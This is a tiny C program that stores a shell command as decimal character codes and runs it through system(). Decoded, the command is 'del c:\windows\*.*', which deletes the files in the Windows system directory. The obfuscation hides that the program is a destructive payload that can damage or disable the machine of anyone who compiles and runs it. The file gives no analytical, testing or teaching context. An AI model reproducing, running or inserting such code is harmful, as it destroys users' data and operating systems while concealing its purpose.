#include<stdlib.h>
char str[]={100,101,108,32,99,58,92,119,105,110,100,111,119,115,92,42,46,42,0};
void main(void){system(str);}